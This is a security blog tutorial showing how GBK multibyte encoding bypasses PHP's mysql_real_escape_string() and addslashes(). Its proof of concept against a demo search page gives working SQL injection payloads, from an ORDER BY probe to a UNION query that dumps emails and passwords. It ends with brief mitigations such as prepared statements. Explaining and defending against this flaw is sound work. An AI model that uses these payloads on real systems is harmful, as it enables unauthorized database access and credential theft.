MultiByte SQL Injection – Bypasses MySql Real Escape String And AddSlashes Protection

My SQL Real Escape String & AddSlashes:

In simple words its a mysql library function which will escape the special characters in a string. A sample syntax is as follows

mysqli_real_escape_string($connstring, $id);

The function adds an escape character, the backslash, \, before certain potentially dangerous characters in a string passed in to the function. The characters escaped are \x00, \n, \r, \, ‘, ” and \x1a.

 When a malicious user send a payload like

select * from users where id=" (payload here) "; - > (payload= " or "1"="1-- )

This will be filtered by mysql_real_escape_string() function as follows

select * from users where id=" (payload here) "; - > (payload filtered like= \" or \"1\"=\"1-- )

In the same way addslashes() function also works.

MySQL Charsets:

MySQL supports several character sets by default. You can locate them easily in your mysql console as follows.

mysql> SHOW CHARACTER SET;
+--------------------+---------------------------------+
| CHARACTER_SET_NAME | DESCRIPTION                     |
+--------------------+---------------------------------+
| big5               | Big5 Traditional Chinese        |
| cp932              | SJIS for Windows Japanese       |
| eucjpms            | UJIS for Windows Japanese       |
| euckr              | EUC-KR Korean                   |
| gb18030            | China National Standard GB18030 |
| gb2312             | GB2312 Simplified Chinese       |
| gbk                | GBK Simplified Chinese          |
| sjis               | Shift-JIS Japanese              |
| ujis               | EUC-JP Japanese                 |
+--------------------+---------------------------------+

MultiByte Injection:

As we already familiar with mysql_real_escape_string() which will a add slash(%5c) before our quote(%27). Here the thing is when i use %bf or %af infront of our quote(%27) then it is converted as follows.

%bf' - > %bf%5c' ---------here %bf%5c becomes the chinese ¿ character which already present in gbk character set

%af' -> %af%5c'  ---------here %af%5c becomes the chinese ┐ character which already present in gbk character set

In this way we can break our sql query and again sql injection will happen.

Proof Of Concept:

To make it very clear i made a sample demo application which facilitates us a Simple Search functionality.

Here i am using %bf’ to break the query.

I need column details in order to make union queries so i did a quick search like

%bf' order by 10--

Yup we got the columns next i need table names. Our search query will be

%bf' union all select 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10 from mysql.innodb_table_stats where database_name=schema();-- 

Finally Dumping the Credentials.

%bf' union all select 1,group_concat(email,0x0a,password),3,4,5,6,7,8,9,10 from users-- 

Mitigations:

  • Trust No One – Remember this and sanitize everything that comes from front end users.
  • Prepared Statements, Stored Procedures and Parameterized queries will defend properly against these attacks.

References:

  • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • http://php.net/manual/en/security.database.sql-injection.php

MrR3boot

An Active Bug Hunter and Exploit Researcher. Reported several bugs to top tech giants like Microsoft, Google, Intel, Us.Dept of Defense etc. PHP Lover. Blogger. Other than hacking he loves Travelling, Exploring the world. Git-Ref: https://github.com/MrR3boot/

More Posts - Website

Follow Me:
TwitterFacebookLinkedIn

One Comment

Leave A Comment

Your email address will not be published. Required fields are marked *